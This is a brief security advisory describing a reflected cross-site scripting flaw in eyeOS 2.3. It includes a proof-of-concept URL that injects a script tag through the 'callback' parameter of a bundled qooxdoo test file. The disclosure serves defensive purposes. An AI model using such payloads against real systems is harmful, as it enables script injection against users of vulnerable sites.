Home
Consulting
Advisories
Software
Articles
Contact

eyeOS 2.3 Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in eyeOS 2.3 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/eyeos/devtools/qooxdoo-sdk/framework/source/resource/qx/test/jsonp_primitive.php?callback=%3Cscript%3Ealert%280%29%3C%2fscript%3E


Copyright © 2018 AutoSec Tools LLC